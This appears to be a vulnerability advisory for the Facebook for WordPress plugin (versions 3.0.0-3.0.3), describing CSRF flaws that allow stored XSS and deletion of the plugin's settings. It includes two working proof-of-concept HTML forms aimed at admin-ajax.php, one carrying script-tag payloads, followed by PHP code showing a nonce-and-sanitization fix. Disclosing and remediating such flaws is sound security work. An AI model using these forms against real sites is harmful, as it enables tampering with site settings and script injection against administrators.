Source: wpexploit | Author: Chloe Chamberland | WPEX-ID: 169D21FC-D191-46FF-82E8-9AC887AED8A4
Published: Mar 25, 2021 - 12:00 a.m.

Facebook for WordPress 3.0.0-3.0.3 - CSRF to Stored XSS and Settings Deletion


The wp_ajax_save_fbe_settings and wp_ajax_delete_fbe_settings AJAX actions of the plugin were vulnerable to CSRF because neither performed a nonce check. In addition, the values handled by the saveFbeSettings function were stored without sanitization, so script tags submitted as settings were saved as-is and later rendered (stored XSS).

CSRF to XSS
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="save_fbe_settings" />
      <input type="hidden" name="pixelId" value="<script>alert(0)</script>" />
      <input type="hidden" name="accessToken" value="<script>alert(0)</script>" />
      <input type="hidden" name="externalBusinessId" value="<script>alert(0)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF to Delete settings
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="delete_fbe_settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
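As an added example (not the plugin's own code), the following shows how the two AJAX actions named above would be hardened in WordPress: a nonce check so a forged cross-site form cannot trigger them, a capability check, and sanitization of the pixelId, accessToken and externalBusinessId values before storage. The function names, the 'fbe_settings_nonce' action string, the 'fbe_settings' option name and the 'fbe-settings-admin' script handle are assumptions for illustration; only the request parameter names come from the advisory.

```php
<?php
// Added example, not the plugin's code. Names below are assumed for illustration.
add_action( 'wp_ajax_save_fbe_settings', 'fbe_settings_save_hardened' );
add_action( 'wp_ajax_delete_fbe_settings', 'fbe_settings_delete_hardened' );

function fbe_settings_authorize() {
    // Nonce check: a cross-site form cannot obtain a valid nonce, so the forged
    // request dies here. Passing false as the third argument returns instead of
    // calling wp_die(), so we can answer with a JSON error and HTTP 403.
    if ( ! check_ajax_referer( 'fbe_settings_nonce', 'nonce', false ) ) {
        wp_send_json_error( 'Invalid or missing nonce.', 403 );
    }
    // Capability check: only users allowed to manage options may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions.', 403 );
    }
}

function fbe_settings_save_hardened() {
    fbe_settings_authorize();
    // sanitize_text_field() strips tags, so "<script>alert(0)</script>" is
    // reduced to "alert(0)" instead of being stored as markup. Output must still
    // be escaped (esc_attr/esc_html) wherever these values are rendered.
    $settings = array(
        'pixelId'            => sanitize_text_field( wp_unslash( $_POST['pixelId'] ?? '' ) ),
        'accessToken'        => sanitize_text_field( wp_unslash( $_POST['accessToken'] ?? '' ) ),
        'externalBusinessId' => sanitize_text_field( wp_unslash( $_POST['externalBusinessId'] ?? '' ) ),
    );
    update_option( 'fbe_settings', $settings );
    wp_send_json_success( $settings );
}

function fbe_settings_delete_hardened() {
    fbe_settings_authorize();
    delete_option( 'fbe_settings' );
    wp_send_json_success();
}

// The plugin's own admin page hands the nonce to its script (assumed handle
// 'fbe-settings-admin') so that legitimate requests can include it as 'nonce'.
function fbe_settings_enqueue_nonce() {
    wp_localize_script( 'fbe-settings-admin', 'fbeSettings', array(
        'nonce' => wp_create_nonce( 'fbe_settings_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'fbe_settings_enqueue_nonce' );
```

With this in place the PoC forms above fail the nonce check before any option is written or deleted, and a legitimate request that somehow carried markup in a setting is stored stripped of tags.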